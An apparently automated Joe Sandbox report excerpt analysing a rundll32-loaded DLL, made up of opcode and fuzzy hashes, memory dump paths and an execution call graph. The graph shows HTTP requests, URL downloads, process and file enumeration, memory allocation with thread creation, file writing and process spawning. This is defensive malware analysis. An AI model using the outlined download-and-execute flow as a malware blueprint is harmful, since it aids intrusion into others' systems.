                                                                                                                                                                                                                                                  • Instruction ID: 894476b8d09a22a5dbe3d770f39793525e4cc36c43d7413f8e4abc8b3aeea73a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9832f5b7719f7b86fd8c38624eed4aee1a7210bb3eeaaf95e05a674a0a924b3e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C1115470314E0985FADAA73554E27FD12816B8C7F9F19CB24B936062C6ED38CB486749
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Value
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3702945584-0
                                                                                                                                                                                                                                                  • Opcode ID: 830f67e147a0935bcec4e640bc060abaaf3c4469f6951c3d39c6dccd234fcab0
                                                                                                                                                                                                                                                  • Instruction ID: e86eebddfadbf209218566a74c72582cf7fff1bf59de2877caf13f980550ab1d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 830f67e147a0935bcec4e640bc060abaaf3c4469f6951c3d39c6dccd234fcab0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5B113030204E0D09FADB632144A67FD12416F4D3FEF1ACB28B8350A2C2ED389B096799
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Value
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3702945584-0
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                                  • String ID: MOC$RCC
                                                                                                                                                                                                                                                  • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                                  • String ID: MOC$RCC
                                                                                                                                                                                                                                                  • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                                  • String ID: csm$csm
                                                                                                                                                                                                                                                  • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: NameName::snprintfswprintf
                                                                                                                                                                                                                                                  • String ID: %lf
                                                                                                                                                                                                                                                  • API String ID: 3974891382-2891890143
                                                                                                                                                                                                                                                  • Opcode ID: 7fc1947d49ae169c503500e1267cacb441c981dc534258eb13393c19efbd0a35
                                                                                                                                                                                                                                                  • Instruction ID: 1d1499fd28cd0defdd0e894b6a29d0ba661b97baa627992bc5e4fd3905ed2300
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7fc1947d49ae169c503500e1267cacb441c981dc534258eb13393c19efbd0a35
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1C01A221614B9840FB929B25B8013DBA361BF9A7C4F54C322BE5967B65DE2CC2578700
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: NameName::snprintfswprintf
                                                                                                                                                                                                                                                  • String ID: %lf
                                                                                                                                                                                                                                                  • API String ID: 3974891382-2891890143
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3805911238.0000016AD2750000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000016AD2750000, based on PE: true
• Associated: 00000006.00000002.3805911238.0000016AD2796000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_16ad2750000_rundll32.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1452528299-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetConsoleMode.KERNEL32(?,?,?,?,000000018001AF96,?,?,000000018001AF96,000000018001AF96,?,000000018001AF96,000000018001AF96,0000000180056604), ref: 0000000180056787
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,000000018001AF96,?,?,000000018001AF96,000000018001AF96,?,000000018001AF96,000000018001AF96,0000000180056604), ref: 0000000180056811
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 953036326-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Name::operator+
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2943138195-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3794425031.0000000273F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000273F40000, based on PE: true
• Associated: 00000006.00000002.3794369878.0000000273F40000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3794425031.0000000273F85000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_273f40000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Sleep_amsg_exit
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1015461914-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Name::operator+$Replicator::operator[]
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: __except_validate_context_record
                                                                                                                                                                                                                                                  • String ID: csm$csm
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Unwind__except_validate_context_record
                                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                  • String ID: .$_.,
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateFrameInfo__except_validate_context_record
                                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: memcpy_s
                                                                                                                                                                                                                                                  • String ID: s
                                                                                                                                                                                                                                                  • API String ID: 1502251526-453955339
                                                                                                                                                                                                                                                  • Opcode ID: d69b12cfc8f0d4f7e4e881a0439bac03a6efd0e78ae662d86089a4382a233e0c
                                                                                                                                                                                                                                                  • Instruction ID: 8ceb7f17a8548fb968498d81ab2351303633656c3688867a1d3cd218ddfc299c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d69b12cfc8f0d4f7e4e881a0439bac03a6efd0e78ae662d86089a4382a233e0c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 43411332304A4887E3EA8F15E495FED7791F39878CF028116DE0957B81CB38CA4ACB49
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Name::operator+
                                                                                                                                                                                                                                                  • String ID: void$void
                                                                                                                                                                                                                                                  • API String ID: 2943138195-3746155364
                                                                                                                                                                                                                                                  • Opcode ID: ddeb0843d538297d14c0c0f86e427d1c8d1caa5713f6d320f941b1835034666f
                                                                                                                                                                                                                                                  • Instruction ID: 9e6cfc430d5bfee4d664579300960906288245c07229e058c69c646796c75a2c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ddeb0843d538297d14c0c0f86e427d1c8d1caa5713f6d320f941b1835034666f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A6311D76A10B58D8FB52CBA4E8403EC37B0B74C788F54852AEE4A67B55DF388259C750
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                                  • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                                  • Opcode ID: f9df25044fb1202a836735dffd389a5b3e506e3fb2604136da670c11918c1c4a
                                                                                                                                                                                                                                                  • Instruction ID: 75816c31b48d4b3f6ac9eaf605c0ba6bcc738f1132b3e0c24f52f264a28ed543
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f9df25044fb1202a836735dffd389a5b3e506e3fb2604136da670c11918c1c4a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B811FB32214B4482EBA28B15E44039A77E5F78CBD8F688225EADD07759DF7DC655CB00
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLastLibraryLoad
                                                                                                                                                                                                                                                  • String ID: api-ms-
                                                                                                                                                                                                                                                  • API String ID: 3568775529-2084034818
                                                                                                                                                                                                                                                  • Opcode ID: 3ce1118a3d68641cf7bcb52c8cfbeb9de588c640064439e36528d49136769137
                                                                                                                                                                                                                                                  • Instruction ID: d49a7e86271a456fbcda335a6394c0a77c9d8b30d4fb553590f1245fc1ea6585
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3ce1118a3d68641cf7bcb52c8cfbeb9de588c640064439e36528d49136769137
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 88F0653171150C82FBF69B6658457F622929B4DBD0F58D830FE0546791EE2D878E8700
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3805911238.0000016AD2750000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000016AD2750000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_16ad2750000_rundll32.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLastRead
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4100373531-0
                                                                                                                                                                                                                                                  • Opcode ID: 5e3dd03f4e36ac629c9e35720315601d05ef0c3755c38ff15dc0a5ec62299b24
                                                                                                                                                                                                                                                  • Instruction ID: 6450de7b296aaf5d35e16fa8b1c5cce2674a7137a43d005f5e22a5bf8aab2bdf
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5e3dd03f4e36ac629c9e35720315601d05ef0c3755c38ff15dc0a5ec62299b24
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E391AD36619B8486DB60CB4AE89035AB7B0F7C9B95F508115EB8E87B68DF3DC444CB01

                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                  Execution Coverage:10.6%
                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                  Signature Coverage:4.6%
                                                                                                                                                                                                                                                  Total number of Nodes:868
                                                                                                                                                                                                                                                  Total number of Limit Nodes:10
calls 4144->4145 4147 f25204 4145->4147 4146 f25265 4148 f25315 4146->4148 4150 f25292 4146->4150 4147->4146 4149 f2be64 3 API calls 4147->4149 4152 f25350 HttpOpenRequestA 4148->4152 4153 f25253 4149->4153 4151 f252c7 HttpOpenRequestA 4150->4151 4154 f2539c 4151->4154 4152->4154 4153->4146 4155 f2be64 3 API calls 4153->4155 4156 f253a4 4154->4156 4157 f253b3 InternetSetOptionA 4154->4157 4158 f253d6 4154->4158 4155->4146 4159 f25479 4156->4159 4161 f282b4 NtFreeVirtualMemory 4156->4161 4157->4158 4160 f25424 HttpSendRequestA 4158->4160 4164 f253e0 4158->4164 4159->4111 4162 f25443 4160->4162 4161->4159 4162->4156 4163 f282b4 NtFreeVirtualMemory 4162->4163 4163->4156 4165 f253fb HttpSendRequestA 4164->4165 4165->4162 4166->4118 4168 f2cf5a 4167->4168 4172 f2cf5c 4167->4172 4168->4132 4169 f2cfaa 4171 f282b4 NtFreeVirtualMemory 4169->4171 4170 f282b4 NtFreeVirtualMemory 4170->4172 4171->4168 4172->4169 4172->4170 4174 f2ce04 4173->4174 4175 f2b388 NtAllocateVirtualMemory 4174->4175 4176 f2ce3b 4174->4176 4177 f2ce6b 4175->4177 4176->4132 4177->4176 4178 f2bfc0 NtAllocateVirtualMemory 4177->4178 4179 f2ce9d 4178->4179 4180 f2b388 NtAllocateVirtualMemory 4179->4180 4181 f2cebc 4180->4181 4181->4176 4182 f282b4 NtFreeVirtualMemory 4181->4182 4182->4176 4219 f244ec 4183->4219 4184 f247e3 4188 f24900 4184->4188 4189 f247ee 4184->4189 4185 f24799 4186 f24852 4185->4186 4187 f247a4 4185->4187 4200 f2bfc0 NtAllocateVirtualMemory 4186->4200 4190 f247af 4187->4190 4191 f2494c 4187->4191 4246 f24334 4188->4246 4201 f2480f 4189->4201 4202 f249ec 4189->4202 4210 f247de 4189->4210 4193 f24931 4190->4193 4194 f247ba 4190->4194 4300 f22b28 4191->4300 4267 f22d50 CreateToolhelp32Snapshot 4193->4267 4197 f24942 4194->4197 4198 f247c5 4194->4198 4196 f24905 4196->4210 4251 f2c704 NtDelayExecution 4196->4251 4299 f2321c CreateThread 4197->4299 4203 f2483e 4198->4203 4204 f247cc 4198->4204 4218 f24870 4200->4218 4206 f2481a 4201->4206 4207 f249f8 4201->4207 4320 f27dfc 4202->4320 4234 
f27940 4203->4234 4211 f247d7 4204->4211 4212 f2491d 4204->4212 4206->4210 4344 f24a20 4206->4344 4207->4210 4331 f27f54 4207->4331 4210->4132 4211->4210 4221 f27c98 4211->4221 4252 f27768 4212->4252 4218->4210 4220 f282b4 NtFreeVirtualMemory 4218->4220 4219->4184 4219->4185 4220->4210 4222 f27cb7 4221->4222 4223 f27cc4 MultiByteToWideChar 4222->4223 4352 f27a84 4223->4352 4226 f27ddf 4227 f282b4 NtFreeVirtualMemory 4226->4227 4233 f27dd8 4226->4233 4227->4233 4228 f27d4b VirtualAlloc 4229 f27d7e 4228->4229 4230 f2b388 NtAllocateVirtualMemory 4229->4230 4231 f27d88 CreateThread 4230->4231 4232 f282b4 NtFreeVirtualMemory 4231->4232 4232->4233 4233->4210 4441 f2830c 4234->4441 4236 f27970 4236->4210 4237 f27963 4237->4236 4238 f28bdc 3 API calls 4237->4238 4239 f279ba wsprintfW 4238->4239 4240 f282b4 NtFreeVirtualMemory 4239->4240 4241 f279df 4240->4241 4242 f27a07 MultiByteToWideChar 4241->4242 4243 f27a84 21 API calls 4242->4243 4244 f27a4f 4243->4244 4244->4236 4449 f2b8d4 4244->4449 4247 f24357 4246->4247 4248 f2434a SetEvent 4246->4248 4249 f24361 ReleaseMutex CloseHandle 4247->4249 4250 f2437b 4247->4250 4248->4247 4249->4250 4250->4196 4251->4196 4253 f277a7 4252->4253 4254 f2830c 4 API calls 4253->4254 4255 f277d3 4254->4255 4256 f28bdc 3 API calls 4255->4256 4264 f277e0 4255->4264 4257 f2782a wsprintfW 4256->4257 4258 f282b4 NtFreeVirtualMemory 4257->4258 4259 f2784f 4258->4259 4260 f27874 MultiByteToWideChar 4259->4260 4261 f27a84 21 API calls 4260->4261 4262 f278b9 4261->4262 4263 f278d9 MultiByteToWideChar 4262->4263 4263->4264 4265 f2790d 4263->4265 4264->4210 4265->4264 4454 f2b9a0 4265->4454 4268 f2b388 NtAllocateVirtualMemory 4267->4268 4269 f22d94 4268->4269 4270 f2be64 3 API calls 4269->4270 4271 f22ddd 4270->4271 4272 f231fb 4271->4272 4273 f22de9 Process32First 4271->4273 4274 f2be64 3 API calls 4272->4274 4275 f22e13 Process32Next 4273->4275 4276 f22e34 4273->4276 4277 f2320c 4274->4277 4275->4275 4275->4276 4278 f2b388 NtAllocateVirtualMemory 
4276->4278 4277->4210 4279 f22e44 Process32First 4278->4279 4280 f22e60 4279->4280 4281 f22ead Process32First 4279->4281 4282 f22e68 Process32Next 4280->4282 4283 f231e6 4281->4283 4288 f22ec8 4281->4288 4282->4281 4282->4282 4284 f282b4 NtFreeVirtualMemory 4283->4284 4285 f231f0 CloseHandle 4284->4285 4285->4272 4286 f231cb Process32Next 4286->4283 4286->4288 4287 f2be64 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 4287->4288 4288->4286 4288->4287 4289 f22fe0 wsprintfA 4288->4289 4290 f2be64 3 API calls 4289->4290 4292 f2300d 4290->4292 4291 f2be64 3 API calls 4291->4292 4292->4291 4293 f23086 wsprintfA 4292->4293 4294 f2be64 3 API calls 4293->4294 4297 f230b3 4294->4297 4295 f2be64 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 4295->4297 4297->4295 4298 f2be64 3 API calls 4297->4298 4463 f2260c CreateToolhelp32Snapshot 4297->4463 4298->4286 4299->4210 4301 f2b388 NtAllocateVirtualMemory 4300->4301 4302 f22b3b 4301->4302 4303 f2be64 3 API calls 4302->4303 4304 f22b7b 4303->4304 4479 f28398 4304->4479 4306 f22cf3 4307 f282b4 NtFreeVirtualMemory 4306->4307 4309 f22d05 4306->4309 4307->4309 4308 f22b8e 4308->4306 4310 f2be64 3 API calls 4308->4310 4311 f2be64 3 API calls 4309->4311 4312 f22bda FindFirstFileA 4310->4312 4313 f22d40 4311->4313 4312->4306 4319 f22bfe 4312->4319 4313->4210 4314 f22ccd FindNextFileA 4315 f22ce8 FindClose 4314->4315 4314->4319 4315->4306 4316 f2be64 3 API calls 4316->4319 4317 f22c98 wsprintfA 4318 f2be64 3 API calls 4317->4318 4318->4319 4319->4314 4319->4316 4319->4317 4321 f27e17 4320->4321 4322 f27e24 MultiByteToWideChar 4321->4322 4323 f27a84 21 API calls 4322->4323 4324 f27e75 4323->4324 4325 f2b388 NtAllocateVirtualMemory 4324->4325 4330 f27f40 4324->4330 4326 f27eb6 4325->4326 4327 f2b388 NtAllocateVirtualMemory 4326->4327 4328 f27ed9 CreateThread 4327->4328 4329 f282b4 NtFreeVirtualMemory 4328->4329 4329->4330 4330->4210 4332 f27f6f 4331->4332 4333 f27f7c MultiByteToWideChar 4332->4333 4334 f27a84 21 API 
calls 4333->4334 4336 f27fcd 4334->4336 4335 f280a4 4335->4210 4336->4335 4337 f2b388 NtAllocateVirtualMemory 4336->4337 4338 f2800e 4337->4338 4487 f2c7dc 4338->4487 4341 f2b388 NtAllocateVirtualMemory 4342 f2803d CreateThread 4341->4342 4343 f282b4 NtFreeVirtualMemory 4342->4343 4343->4335 4345 f24a2c 4344->4345 4346 f24aec MultiByteToWideChar 4345->4346 4348 f24acc 4345->4348 4349 f24b7d MultiByteToWideChar 4345->4349 4350 f24bd6 wsprintfW 4345->4350 4347 f2830c 4 API calls 4346->4347 4347->4345 4348->4210 4349->4345 4351 f27a84 21 API calls 4350->4351 4351->4345 4353 f27ac4 4352->4353 4359 f27b28 4353->4359 4360 f2c00c NtAllocateVirtualMemory 4353->4360 4363 f2900c 4353->4363 4383 f276d8 4353->4383 4395 f28240 4353->4395 4355 f27c5d 4356 f27c68 4355->4356 4358 f282b4 NtFreeVirtualMemory 4355->4358 4356->4226 4356->4228 4357 f282b4 NtFreeVirtualMemory 4357->4355 4358->4356 4359->4355 4359->4357 4360->4353 4364 f2904b InternetOpenW 4363->4364 4365 f29086 4364->4365 4366 f2908b 4364->4366 4369 f29248 4365->4369 4370 f2923d InternetCloseHandle 4365->4370 4401 f255dc 4366->4401 4371 f29250 InternetCloseHandle 4369->4371 4372 f2925b 4369->4372 4370->4369 4371->4372 4372->4353 4373 f290f4 4375 f29106 4373->4375 4376 f282b4 NtFreeVirtualMemory 4373->4376 4377 f29118 InternetOpenUrlW 4375->4377 4378 f282b4 NtFreeVirtualMemory 4375->4378 4376->4375 4377->4365 4380 f29154 4377->4380 4378->4377 4379 f2915f InternetReadFile 4379->4380 4380->4365 4380->4379 4381 f2b648 3 API calls 4380->4381 4382 f2b388 NtAllocateVirtualMemory 4380->4382 4381->4380 4382->4380 4423 f292f8 4383->4423 4386 f276fb 4386->4353 4389 f2774e 4389->4386 4392 f282b4 NtFreeVirtualMemory 4389->4392 4390 f2bf78 3 API calls 4391 f27729 4390->4391 4391->4389 4393 f2772d 4391->4393 4392->4386 4394 f282b4 NtFreeVirtualMemory 4393->4394 4394->4386 4435 f280b8 4395->4435 4398 f2827f 4398->4353 4402 f25614 4401->4402 4403 f2b388 NtAllocateVirtualMemory 4402->4403 4404 f2563a 4403->4404 4405 f2b388 
NtAllocateVirtualMemory 4404->4405 4406 f25650 InternetCrackUrlW 4405->4406 4407 f256ac 4406->4407 4408 f256c6 4406->4408 4409 f282b4 NtFreeVirtualMemory 4407->4409 4408->4365 4408->4373 4412 f2c860 4408->4412 4410 f256b9 4409->4410 4411 f282b4 NtFreeVirtualMemory 4410->4411 4411->4408 4413 f2c894 InternetConnectW 4412->4413 4414 f2c8df 4412->4414 4413->4414 4417 f2c8e4 HttpOpenRequestW 4413->4417 4415 f2c9e0 4414->4415 4416 f2c9d5 InternetCloseHandle 4414->4416 4418 f2c9f3 4415->4418 4419 f2c9e8 InternetCloseHandle 4415->4419 4416->4415 4417->4414 4420 f2c936 HttpSendRequestW 4417->4420 4418->4373 4419->4418 4421 f2c9a7 HttpSendRequestW 4420->4421 4422 f2c955 InternetQueryOptionW InternetSetOptionW 4420->4422 4421->4414 4422->4421 4424 f2c00c NtAllocateVirtualMemory 4423->4424 4426 f29318 4424->4426 4425 f276f7 4425->4386 4428 f2bf78 4425->4428 4426->4425 4427 f282b4 NtFreeVirtualMemory 4426->4427 4427->4425 4429 f2bf90 4428->4429 4432 f2bf0c 4429->4432 4431 f27713 4431->4389 4431->4390 4433 f2b704 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 4432->4433 4434 f2bf40 4433->4434 4434->4431 4436 f280f9 4435->4436 4437 f2810b RtlInitUnicodeString NtCreateFile 4436->4437 4438 f281b1 4437->4438 4438->4398 4439 f281c8 NtWriteFile 4438->4439 4440 f28230 NtClose 4439->4440 4440->4398 4442 f2b470 4441->4442 4443 f28326 SHGetFolderPathW 4442->4443 4444 f2834f 4443->4444 4445 f2c00c NtAllocateVirtualMemory 4444->4445 4447 f2835b 4445->4447 4446 f28368 4446->4237 4447->4446 4448 f2bf78 3 API calls 4447->4448 4448->4446 4450 f2b8ee 4449->4450 4451 f2b926 CreateProcessW 4450->4451 4452 f2b976 4451->4452 4453 f2b97a CloseHandle CloseHandle 4451->4453 4452->4236 4453->4452 4455 f2b9c0 4454->4455 4456 f2ba1e 4455->4456 4457 f2ba78 4455->4457 4458 f2ba53 wsprintfW 4456->4458 4459 f2baad wsprintfW 4457->4459 4460 f2bac8 CreateProcessW 4458->4460 4459->4460 4461 f2bb1b 4460->4461 4462 f2bb1f CloseHandle CloseHandle 4460->4462 4461->4264 4462->4461 4464 f22659 Process32First 
